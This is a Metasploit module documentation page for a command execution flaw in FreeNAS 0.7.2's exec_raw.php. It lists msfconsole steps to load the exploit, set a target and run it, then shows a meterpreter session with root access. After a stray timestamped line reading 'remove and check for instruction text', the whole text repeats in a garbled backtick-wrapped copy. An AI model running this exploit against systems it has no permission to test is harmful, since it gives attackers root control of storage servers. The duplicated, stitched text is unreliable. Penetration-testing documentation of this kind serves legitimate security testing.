documentation/modules/exploit/multi/http/freenas_exec_raw.md

## Vulnerable Application

This module exploits an arbitrary command execution flaw
in FreeNAS 0.7.2 < rev.5543. When passing a specially formatted URL
to the exec_raw.php page, an attacker may be able to execute arbitrary commands.

NOTE: This module works best with php/meterpreter payloads.

## Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: ```use exploit/multi/http/freenas_exec_raw```
  4. Do: ```set rhost [ip]```
  5. Do: ```run```
  6. You should get a shell.

## Options

## Scenarios

### Unknown

```
meterpreter > sysinfo
Computer: freenas.local
OS      : FreeBSD freenas.local 7.3-RELEASE-p2 FreeBSD 7.3-RELEASE-p2 #0: Sat Jul 31 12:22:04 CEST 2010     root@dev.freenas.org:/usr/obj/freenas/usr/src/sys/FREENAS-i386 i386
meterpreter > getuid
Server username: root (0)
meterpreter >
```
remove and check for instruction text 2020-03-24 09:15:04 -04:00			`## Vulnerable Application`

			`This module exploits an arbitrary command execution flaw`
			`in FreeNAS 0.7.2 < rev.5543. When passing a specially formatted URL`
			`to the exec_raw.php page, an attacker may be able to execute arbitrary commands.`

			`NOTE: This module works best with php/meterpreter payloads.`

			`## Verification Steps`

			`1. Install the application`
			`2. Start msfconsole`
			3. Do: ```use exploit/multi/http/freenas_exec_raw```
			4. Do: ```set rhost [ip]```
			5. Do: ```run```
			`6. You should get a shell.`

			`## Options`

			`## Scenarios`

			`### Unknown`

			```
			`meterpreter > sysinfo`
			`Computer: freenas.local`
			`OS : FreeBSD freenas.local 7.3-RELEASE-p2 FreeBSD 7.3-RELEASE-p2 #0: Sat Jul 31 12:22:04 CEST 2010 root@dev.freenas.org:/usr/obj/freenas/usr/src/sys/FREENAS-i386 i386`
			`meterpreter > getuid`
			`Server username: root (0)`
			`meterpreter >`
			```